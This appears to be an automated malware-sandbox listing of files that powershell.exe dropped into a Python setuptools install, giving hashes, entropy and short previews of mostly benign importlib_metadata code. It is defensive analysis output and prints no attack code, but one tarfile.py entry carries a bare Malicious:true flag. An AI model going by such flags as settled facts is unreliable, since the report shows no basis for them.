                                                                                                                                                                                                                              SHA-512:8CBEE444735DFE4900023E63956A96F08CA59C68413E588B3998B6E67D13C6277C821BA8C87DA9FF8017F5B6A03C1198CA0C1EBD30095D1C7AE1B22B39276173
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:#!/usr/bin/env python3.#-------------------------------------------------------------------.# tarfile.py.#-------------------------------------------------------------------.# Copyright (C) 2002 Lars Gustaebel <lars@gustaebel.de>.# All rights reserved..#.# Permission is hereby granted, free of charge, to any person.# obtaining a copy of this software and associated documentation.# files (the "Software"), to deal in the Software without.# restriction, including without limitation the rights to use,.# copy, modify, merge, publish, distribute, sublicense, and/or sell.# copies of the Software, and to permit persons to whom the.# Software is furnished to do so, subject to the following.# conditions:.#.# The above copyright notice and this permission notice shall be.# included in all copies or substantial portions of the Software..#.# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):26498
                                                                                                                                                                                                                              Entropy (8bit):4.556969344671684
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:H1X3KBOMUTiwcCGkOrk0K5zp0ZqC84TTQT+IKVM1HSWPjqKYmEXm:HPMYixjoBUqCbkcWs9K8Xm
                                                                                                                                                                                                                              MD5:0C640AA0CA3997431B7769182B478F41
                                                                                                                                                                                                                              SHA1:C26880155554AFAF6B735175BD4C42F12AD47AB8
                                                                                                                                                                                                                              SHA-256:7D012C25BEC6B3FF55ABD574C47202074105C4D446CB1B9BAF8C386459867316
                                                                                                                                                                                                                              SHA-512:58D02757D902F81FEDBB54A5D740F23C422958C6754E504B63BC011E44B2ED745BFED00C5FDC117A22F799359F854873766412E4996AF0A88C79FA501CD340D7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import os.import re.import abc.import csv.import sys.from .. import zipp.import email.import pathlib.import operator.import textwrap.import warnings.import functools.import itertools.import posixpath.import collections..from . import _adapters, _meta, _py39compat.from ._collections import FreezableDefaultDict, Pair.from ._compat import (. NullFinder,. install,. pypy_partial,.).from ._functools import method_cache, pass_none.from ._itertools import always_iterable, unique_everseen.from ._meta import PackageMetadata, SimplePath..from contextlib import suppress.from importlib import import_module.from importlib.abc import MetaPathFinder.from itertools import starmap.from typing import List, Mapping, Optional...__all__ = [. 'Distribution',. 'DistributionFinder',. 'PackageMetadata',. 'PackageNotFoundError',. 'distribution',. 'distributions',. 'entry_points',. 'files',. 'metadata',. 'packages_distributions',. 'requires',. 'version',.]...class Pack
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):45231
                                                                                                                                                                                                                              Entropy (8bit):5.163705583334964
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:FCM2z4hnBmbzCGa5kEDBzoNVR/PWH/QXRd+L:FCpz4h4bLykeBEN6H/GO
                                                                                                                                                                                                                              MD5:CD63834E1032A2F66F43CCFA6E011775
                                                                                                                                                                                                                              SHA1:2C5E162CEF89B575EAAB958263AE00CD7F1FD787
                                                                                                                                                                                                                              SHA-256:4D28C569E2AE7C62D125F999C67B822E458D1AA254B37A5F663798E54DA6B5FF
                                                                                                                                                                                                                              SHA-512:98D6C2144A35642135C035E21C07E296E9B190A81A445C8C03355E1E2238C88C097719DAE4179F200EC27110EA7D86447146B6CA6F5A0968EF09A689C8C72185
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf.g........................B.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m Z m!Z!..d.d.l"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'..d.d.l.m(Z(..d.d.l)m*Z*m+Z+m,Z,..g.d...Z-..G.d...d.e.........Z/..G.d...d.........Z0..G.d...d.........Z1..G.d...d.e1........Z2..G.d...d.e3........Z4..G.d...d.e.jj..........................Z6..G.d...d.........Z7..G.d...d e.jp...................!........Z9..G.d"..d#e'........Z:..G.d$..d%........Z;..G.d&..d'........Z<..G.d(..d)........Z=e...G.d*..d+e.e:................Z>..G.d,..d-e9........Z?d...Z@d/..ZAd0e.j@..................f.d1..ZBd2..ZC..e.j...................e.e.j....................3........ZF..d0e4f.d4..ZGd5..ZHd6..ZId0e+eJe*eJ....f.....f.d7..ZKd8..ZLd9..ZMy.):.....N.....)...zipp.....)..._adapters.._meta.._py39compat)...FreezableDefaultDict..Pair)...NullFinder..install..pypy_parti
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3941
                                                                                                                                                                                                                              Entropy (8bit):5.305923123438267
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:19rAXRGKnux8XYZZTR7mCJXMQjKcUZlt8xwZNXaHBI/tZgGOQeW5Y:7lKuIYZLMHTZl6aa2/7uV
                                                                                                                                                                                                                              MD5:8104D9FCFC5D3E7AD3E708E638ADF29E
                                                                                                                                                                                                                              SHA1:2C7F364E5017D81FD3BD3CC6E8A0ABCEC82706BE
                                                                                                                                                                                                                              SHA-256:34FAB072A8262A91257156F557A9069BE3D1E78EAD345B93CD96E1639D2EA594
                                                                                                                                                                                                                              SHA-512:FD9785B228534F76450F5CA34CA5861621DC1F09B92E8B8216ECA353599BFE55FF1D0C86654C67FD97B9DB3547B31E8F3BCC9B2731105C8E4BADC52EC2D7F6DB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.....e.j...................e.j...................d.e...e.d...................Z...G.d...d.e.j...................j...........................Z.y.)......N.....)...FoldedCase)...pypy_partialzFImplicit None on return values is deprecated and will raise KeyErrors......)...stacklevelc............................e.Z.d.Z...e...e.e.g.d...................Z...d.e.j...................j...................f...f.d...Z.d...Z...f.d...Z...f.d...Z.d...Z.e.d...........Z...x.Z.S.)...Message)...Classifierz.Obsoletes-Dist..Platformz.Project-URLz.Provides-Distz.Provides-Extraz.Requires-Distz.Requires-Externalz.Supported-Platform..Dynamic..origc.....................l.......t...........|.....|.........}.t.........|.........j...................t.........|...................|.S...N)...super..__new__..vars..update)...clsr......res..__class__s.... ..`C:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_ve
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1928
                                                                                                                                                                                                                              Entropy (8bit):5.145209258178781
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:eXl4KOSIV6KjGxOOlcBMHKgR2I2Hl+p3Y:e2KOSO6tYO+MHRJ2HY3Y
                                                                                                                                                                                                                              MD5:56C13396BA5B5A6DA81006F369D08BD0
                                                                                                                                                                                                                              SHA1:E4D249DE2BDC6F8DF8BB2C7DFC3F5A4605395A60
                                                                                                                                                                                                                              SHA-256:42830D97262A60023D4197C83AD0B78F3C32AABF497AE616169E782085588EAD
                                                                                                                                                                                                                              SHA-512:DA99EE1889EA7A14F1F13814EE49D453E43B2C7FA5B5DC31EAAEC4C055DD36DE49141DF0A81ED9A688B422C0781E65EABC5FF465BF85D3078368882A1501A29A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................n.....d.d.l.Z...G.d...d.e.j...........................Z...G.d...d...e.j...................d.d.................Z.y.)......Nc.....................(.......e.Z.d.Z.d.Z...f.d...Z.d...Z...x.Z.S.)...FreezableDefaultDicta!.... Often it is desirable to prevent the mutation of. a default dict after its initial construction, such. as to prevent mutation during iteration... >>> dd = FreezableDefaultDict(list). >>> dd[0].append('1'). >>> dd.freeze(). >>> dd[1]. []. >>> len(dd). 1. c.....................:.........t.........|.d.t...........|.............|.........S.).N.._frozen)...getattr..super..__missing__)...self..key..__class__s.... ..cC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/importlib_metadata/_collections.pyr....z FreezableDefaultDict.__missing__....s.........<.w.t.Y.....(;..<.S..A..A.....c...............................f.d....._.........y.).Nc.....................$.........j.........................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2450
                                                                                                                                                                                                                              Entropy (8bit):5.3157230701766816
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:s4Zdy/RshWx10WSdiRU2FlA34q3qVtK6weNofy5lZOWrstqS17:tZMsg524q3KtK6weN7vskO
                                                                                                                                                                                                                              MD5:5F059CFD291872F68C516EBB729CB45E
                                                                                                                                                                                                                              SHA1:825954062355199749E174991CD1B3A60EC7D852
                                                                                                                                                                                                                              SHA-256:7657E39258A81EAD18274F2F8458400692C31BF36EC83A64227996CE00B95658
                                                                                                                                                                                                                              SHA-512:D8653AF4155A1CE9E1B8B70DC4CD094AB2B69C7BFE4E9C580EFA87D414472CE7A8FA04C1E9E266D3A0F85CA700F6A4150FF2F0411B15E7BE46B4367A82C8B15F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.VfC.........................r.....d.d.l.Z.d.d.l.Z.g.d...Z...d.d.l.m.Z...d...Z.d...Z...G.d...d.........Z.d...Z.y.#.e.$.r...d.d.l.m.Z...Y..!w.x.Y.w.)......N)...install..NullFinder..Protocol).r.........c.....................b.....t.........j...................j.....................|...................t...................|.S.).z.. Class decorator for installation on sys.meta_path... Adds the backport DistributionFinder to sys.meta_path and. attempts to disable the finder functionality of the stdlib. DistributionFinder.. )...sys..meta_path..append..disable_stdlib_finder)...clss.... .^C:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/importlib_metadata/_compat.pyr....r........s#...........M.M.......................J.....c.....................L.....d...}.t.........|.t.........j...........................D.]...}.|.`.....y.).z.. Give the backport primacy for discovering path-based distributions. by monkey-patching the stdlib O_O... See #91 for mo
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3486
                                                                                                                                                                                                                              Entropy (8bit):5.271613676287075
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:yfbuTGKoOIXlUsSUUEQ1lGIGX5G5GurSYwBpHPdG7lfsJdSOTK/J/SarXN0le/yx:yGoOCDUX4sXwjvMXNpaq3NkIO5pL
                                                                                                                                                                                                                              MD5:94D8EDAA1B4DB6BAB77B2FEC5AB8FFB0
                                                                                                                                                                                                                              SHA1:F53CB0E85880939956FC1493111F5A87CBF814BF
                                                                                                                                                                                                                              SHA-256:369ADD4990DC2668BCBF765AA304D0D21F406D9DF262147110926641737FB3EF
                                                                                                                                                                                                                              SHA-512:9E2BA242207439B9EB8D132BD9696993313DFA2B2086CDD7E80FA1D74B265E3BDFA2F880EFFB4ACD64617D188EA7C967AE6FD0435A768F130FF2B97668CABC91
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.VfO.........................".....d.d.l.Z.d.d.l.Z.d.d...Z.d...Z.y.)......Nc.....................V...........x.s...t.........j.................................f.d...}.d...|._.........|.S.).aV.... Wrap lru_cache to support storing the cache data in the object instances... Abstracts the common paradigm where the method explicitly saves an. underscore-prefixed protected property on first call and returns that. subsequently... >>> class MyClass:. ... calls = 0. .... ... @method_cache. ... def method(self, value):. ... self.calls += 1. ... return value.. >>> a = MyClass(). >>> a.method(3). 3. >>> for x in range(75):. ... res = a.method(x). >>> a.calls. 75.. Note that the apparent behavior will be exactly like that of lru_cache. except that the cache is stored on each instance, so values in one. instance will not flush values from another, and when an instance is. deleted, so are the ca
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2410
                                                                                                                                                                                                                              Entropy (8bit):5.4940235066720575
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:3+N3JjfPMr3xTZ48AVCkCzOQVQqtXBcNqo+UoJyE5fp:uN5j03D48lhBnY+UhE5R
                                                                                                                                                                                                                              MD5:D89B0F259EC3D7DA5D280029396D529F
                                                                                                                                                                                                                              SHA1:803EB926BB2C26651B7E68AADB42524E18149C89
                                                                                                                                                                                                                              SHA-256:F27E2B610A669727A5102731775F11E4D14BEF679CC0D25BEE6B887AF568BF5B
                                                                                                                                                                                                                              SHA-512:58BEE498E85FDAE910DE1FF0F4278AC928DA3000B10D8137E67AAB3DB59BCD9317841365FF7B3ACFAC878E7E057501FE05127B6303AE42BA299D8B2EB3C0FCF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................&.....d.d.l.m.Z...d.d...Z.e.e.f.f.d...Z.y.)......)...filterfalseNc................#........K.....t.................}.|.j...................}.|..(t.........|.j...................|.........D.]...}...|.|...........|...........y.|.D.]...}...|.|.........}.|.|.v.s.....|.|...........|...........y...w.).zHList unique elements, preserving order. Remember all elements ever seen.N)...set..addr......__contains__)...iterable..key..seen..seen_add..element..ks.... .aC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/importlib_metadata/_itertools.py..unique_everseenr........ss..............5.D....x.x.H....{..".4.#4.#4.h..?......G....W.......M......... ......G....G...A......}..................s.....A.A$....A$.c..........................|...t.........d.........S.|...t.........|.|.........r.t.........|.f.........S...t.........|.........S.#.t.........$.r...t.........|.f.........c.Y.S.w.x.Y.w.).ax...If *obj* is iterable, return an iterator over its
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2694
                                                                                                                                                                                                                              Entropy (8bit):5.045300667404216
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:n4kkxFGnMxvdIl0RtlqAeku4eyiMZCTacMDDSwkldA8/75WLse6+:n4kkxFUMBKEXNekeyicCTjASB5sQH+
                                                                                                                                                                                                                              MD5:8BAE563E4414459B2908300095CF2148
                                                                                                                                                                                                                              SHA1:3B080F468831D25A4EB1F466781E93EA9F0E90B5
                                                                                                                                                                                                                              SHA-256:884196CEF943D9333A25BC9CED1E7845F355458C4A337C5717D99BF6768C5662
                                                                                                                                                                                                                              SHA-512:3A5DFDEB951BE27C31CE5CE8A4797DA2F042C5C46A426D741255B22195215BFBEE2B2F4463997BD05D618F0BBA6E0B7CEB0E01BFDBD32E2058BB17A004E21364
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................r.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.........Z...G.d...d.e.........Z...G.d...d.e.e.............Z.y.)......)...Protocol.....)...Any..Dict..Iterator..List..TypeVar..Union.._Tc..........................e.Z.d.Z.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.e.....f.d...Z.d.d.e.d.e.d.e.e.e.....e.f.....f.d...Z.e.d.e.e.e.e.e.e.....f.....f.....f.d...........Z.y.)...PackageMetadata..returnc...........................y...N......selfs.... .\C:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/importlib_metadata/_meta.py..__len__z.PackageMetadata.__len__.....................itemc...........................y.r....r....).r....r....s.... r......__contains__z.PackageMetadata.__contains__....r....r......keyc...........................y.r....r....).r....r....s.... r......__getitem__z.PackageMetadata.__getitem__....r....r....c...........................y.r....r....r....s.... r......__iter__z.PackageMetadata.__iter__....r....r......n
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1642
                                                                                                                                                                                                                              Entropy (8bit):5.467765807360284
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:jXTzFugtySlyJxekb7DjicPG8ljwjdi7i2+5:DXXtySyJHb7Dil5
                                                                                                                                                                                                                              MD5:0795E7A479899E11DA1636AFD351AE60
                                                                                                                                                                                                                              SHA1:915FCEACF8E6B6A80DACEEB468EDF58D9F7BE4C9
                                                                                                                                                                                                                              SHA-256:36CB199C6C8E26D139FC3A11D73FF71981063E794CAE22BABEF913735ADF1E25
                                                                                                                                                                                                                              SHA-512:BAF57D8CE7996FC266DAB3CCE9E55911B815B3B7C75F7CCB8DADE909B8198AF8B41F4051EF2F77C8E22D5A6107A7415BE58BCA23430F733C699C65F27AFA372A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.VfJ.........................`.....d.Z.d.d.l.m.Z.m.Z.m.Z...e.r.d.d.l.m.Z.m.Z...n.e.x.Z.Z.d.e.d.e.e.....f.d...Z.d.e.d.e.f.d...Z.y.).z).Compatibility layer with Python 3.8/3.9......)...TYPE_CHECKING..Any..Optional.....)...Distribution..EntryPoint..dist..returnc............................|.j...................S.#.t.........$.r6..d.d.l.m.}...|.j...................t.........|.d.d.........x.s...|.j...................d.............c.Y.S.w.x.Y.w.).z]. Honor name normalization for distributions that don't provide ``_normalized_name``.. r....)...Prepared..nameN..Name)..._normalized_name..AttributeError..r......normalize..getattr..metadata).r....r....s.... .bC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/importlib_metadata/_py39compat.py..normalized_namer........sP.........X......$..$..$........X.........!..!.'.$....."=."V.......v.AV..W..W....X..s.........<A.....A....epc...............................|.j...................d.i.|.....S.#.t.........$.rA..d.d.l.m.}
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3887
                                                                                                                                                                                                                              Entropy (8bit):4.993776162952286
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:vzrbGowYRzHinOrIAeQc2jrBEYWdDMWwAk+S3MOjRM:CowCmVAeQvBEYWdPwFnK
                                                                                                                                                                                                                              MD5:E9D6ECC13AFDE52B411B4FD2219C6E1F
                                                                                                                                                                                                                              SHA1:699508A8E318523FA0672DB2A471D3B315FD81C6
                                                                                                                                                                                                                              SHA-256:43BBBBF24D4E87B7D3A4588D256FD647E7A5EF3943A8A546CFEB15F817F0209E
                                                                                                                                                                                                                              SHA-512:BD71A365ED6C70CF7B9D680D457302092B39F9378E4D07F0860F97EEBE73C0C2F87EAC30AA3CA18E27A116B53CE2C9ED2A7FC2441FA9BCB9E44ADD059FFC8BC0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vfv...............................d.d.l.Z.d.d.l.m.Z.....G.d...d.e.........Z.y.)......N.....)...method_cachec.....................h.......e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z...f.d...Z.d...Z.e...f.d...........Z.d...Z.d.d...Z...x.Z.S.)...FoldedCasea{.... A case insensitive string class; behaves just like str. except compares equal when the only variation is case... >>> s = FoldedCase('hello world').. >>> s == 'Hello World'. True.. >>> 'Hello World' == s. True.. >>> s != 'Hello World'. False.. >>> s.index('O'). 4.. >>> s.split('O'). ['hell', ' w', 'rld'].. >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])). ['alpha', 'Beta', 'GAMMA'].. Sequence membership is straightforward... >>> "Hello World" in [s]. True. >>> s in ["Hello World"]. True.. You may test for set inclusion, but candidate and elements. must both be folded... >>> FoldedCase("Hello World") in {s}. True. >>> s in {FoldedCase("Hello Wo
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2454
                                                                                                                                                                                                                              Entropy (8bit):4.397515169526915
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:SGUcskXpvpS/nC+zHW8Hov3mJXuVCzB95llp4NxsFFqjltPsqqe1CkD:STcskp2C+5s0zldF6lT7CkD
                                                                                                                                                                                                                              MD5:A87ACDEAD6EAB12A5D566FCB4CE4D033
                                                                                                                                                                                                                              SHA1:B55CEE37D1E4FA615B627F39F59BC425F55CCD88
                                                                                                                                                                                                                              SHA-256:8BC4BA21BD4E4237082C0FA5E2093392D3197B5F1369E50D238F4F2D1A7A3815
                                                                                                                                                                                                                              SHA-512:7908898228D66959CB6C0E3D4DF1DA8FA2405D98C3A16BE69D7C6CEE7A8C4A58D0B401E322630EC901CAC5D5AD1A58CF0FEC68186381CA88BE333FA27A935FD3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import functools.import warnings.import re.import textwrap.import email.message..from ._text import FoldedCase.from ._compat import pypy_partial...# Do not remove prior to 2024-01-01 or Python 3.14._warn = functools.partial(. warnings.warn,. "Implicit None on return values is deprecated and will raise KeyErrors.",. DeprecationWarning,. stacklevel=pypy_partial(2),.)...class Message(email.message.Message):. multiple_use_keys = set(. map(. FoldedCase,. [. 'Classifier',. 'Obsoletes-Dist',. 'Platform',. 'Project-URL',. 'Provides-Dist',. 'Provides-Extra',. 'Requires-Dist',. 'Requires-External',. 'Supported-Platform',. 'Dynamic',. ],. ). ). """. Keys that may be indicated multiple times per PEP 566.. """.. def __new__(cls, orig: email.message.Message):. res = sup
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):743
                                                                                                                                                                                                                              Entropy (8bit):4.651100681651683
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:QSxg74MOelLMEvSrqOyMsNZ3AEiFMaH4p/IV/pZ7ubF19htVYCv:25lLM8ZOSIJmaHCwVBZ7mV
                                                                                                                                                                                                                              MD5:353C8330C9BBF4267F66DCDBEE93A012
                                                                                                                                                                                                                              SHA1:4E07A9EF47D40DDD33EB1D29C8277823AD97A01B
                                                                                                                                                                                                                              SHA-256:089D0E4C21C88D6034648552E2FA0E440B27D91E11D9C40112D3EC6442690126
                                                                                                                                                                                                                              SHA-512:FD3B35422E04CBAA2A6D2B2178577F58AC663C3F7CD5472893E33B4FDE5FCEEF32F353891331CA1E9911F0E08F36F2D52073D26D19374D9A43AC22BBAF138451
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import collections...# from jaraco.collections 3.3.class FreezableDefaultDict(collections.defaultdict):. """. Often it is desirable to prevent the mutation of. a default dict after its initial construction, such. as to prevent mutation during iteration... >>> dd = FreezableDefaultDict(list). >>> dd[0].append('1'). >>> dd.freeze(). >>> dd[1]. []. >>> len(dd). 1. """.. def __missing__(self, key):. return getattr(self, '_frozen', super().__missing__)(key).. def freeze(self):. self._frozen = lambda key: self.default_factory()...class Pair(collections.namedtuple('Pair', 'name value')):. @classmethod. def parse(cls, text):. return cls(*map(str.strip, text.split("=", 1))).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1859
                                                                                                                                                                                                                              Entropy (8bit):4.61975719642625
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:kpT333Ry/R+a+nd6+CSdiRU280tKuqXQMHRGiIemC7KoxW6gH8M:kVQ+y80tKuqgMHbvmCNg7
                                                                                                                                                                                                                              MD5:743DE86E3B1D7120D32708F92DDA1C95
                                                                                                                                                                                                                              SHA1:C7E910377B6A461A8E1757E4A41030C44E9A0800
                                                                                                                                                                                                                              SHA-256:1AD76A985CBFCA45524E4CFA31D18BDA0DD5E64C6F40A1D35B12990A4E50E7D4
                                                                                                                                                                                                                              SHA-512:7D847C4C6279590F644C9E90282180F8929B84E5AF04FC04FF66FA584C7CE4F4F45EF4E36C8EFD941184CABB5A26E06C56F9D9FA21220CC3E8C080A70F3A8B9A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import sys.import platform...__all__ = ['install', 'NullFinder', 'Protocol']...try:. from typing import Protocol.except ImportError: # pragma: no cover. # Python 3.7 compatibility. from ..typing_extensions import Protocol # type: ignore...def install(cls):. """. Class decorator for installation on sys.meta_path... Adds the backport DistributionFinder to sys.meta_path and. attempts to disable the finder functionality of the stdlib. DistributionFinder.. """. sys.meta_path.append(cls()). disable_stdlib_finder(). return cls...def disable_stdlib_finder():. """. Give the backport primacy for discovering path-based distributions. by monkey-patching the stdlib O_O... See #91 for more background for rationale on this sketchy. behavior.. """.. def matches(finder):. return getattr(. finder, '__module__', None. ) == '_frozen_importlib_external' and hasattr(finder, 'find_distributions').. for finder in filter(mat
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2895
                                                                                                                                                                                                                              Entropy (8bit):4.575749351576048
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:P4DW5buTGKoOIXlUsSUUEQ1lGIGX5G5GurSYwBpHPdG7lfsJdSOTK/J/SarXN0lJ:P4DWQoOCDUX4sXwjvMXNpasDyb0/Ip1z
                                                                                                                                                                                                                              MD5:0CFF4DF9BE03F65A6155A8597048463E
                                                                                                                                                                                                                              SHA1:69D5ECD15436AC8A0774DD5C4388F32425A9E128
                                                                                                                                                                                                                              SHA-256:3EC636FB8AEB297E1155E442D681A9D65075A660BD78A37CF3F7FE6C3F6E3A80
                                                                                                                                                                                                                              SHA-512:E3031124D5A0EB6D1B05C249487609EE34E2A6BC3B2D9205DFE9065E1F89D84091D50C086BCEF64ABA3477E61415CFD9B25CD2E3DA1BEDC25857945CF65BBF83
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import types.import functools...# from jaraco.functools 3.3.def method_cache(method, cache_wrapper=None):. """. Wrap lru_cache to support storing the cache data in the object instances... Abstracts the common paradigm where the method explicitly saves an. underscore-prefixed protected property on first call and returns that. subsequently... >>> class MyClass:. ... calls = 0. .... ... @method_cache. ... def method(self, value):. ... self.calls += 1. ... return value.. >>> a = MyClass(). >>> a.method(3). 3. >>> for x in range(75):. ... res = a.method(x). >>> a.calls. 75.. Note that the apparent behavior will be exactly like that of lru_cache. except that the cache is stored on each instance, so values in one. instance will not flush values from another, and when an instance is. deleted, so are the cached values for that instance... >>> b = MyClass(). >>> for x in range(35):. ...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2068
                                                                                                                                                                                                                              Entropy (8bit):4.470294815314809
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Hue/JjWAeR3QNzVpqQ3CzOQVQqtXBcNqo+U3XsLmrpu:Dhj+3Q78QmhBnY+UMt
                                                                                                                                                                                                                              MD5:E8B2EC154B06470409367058F706666D
                                                                                                                                                                                                                              SHA1:40B1034A8BBB3F59720230C6D05C239977B37A11
                                                                                                                                                                                                                              SHA-256:72FAFFDAFF0145BC5C225E71E6575FA9D1E3848F188BCB3CCA4E741BF9E6EA34
                                                                                                                                                                                                                              SHA-512:8CA596A18F1C171BA2CF46791AAB2618A16B85EA73BBF2F4123F1907A3F25446883220853391F5A7D9E76DF6B5E9E2284CBB768A9352B34C4FB664F50F292FDE
                                                                                                                                                                                                                              Malicious:false
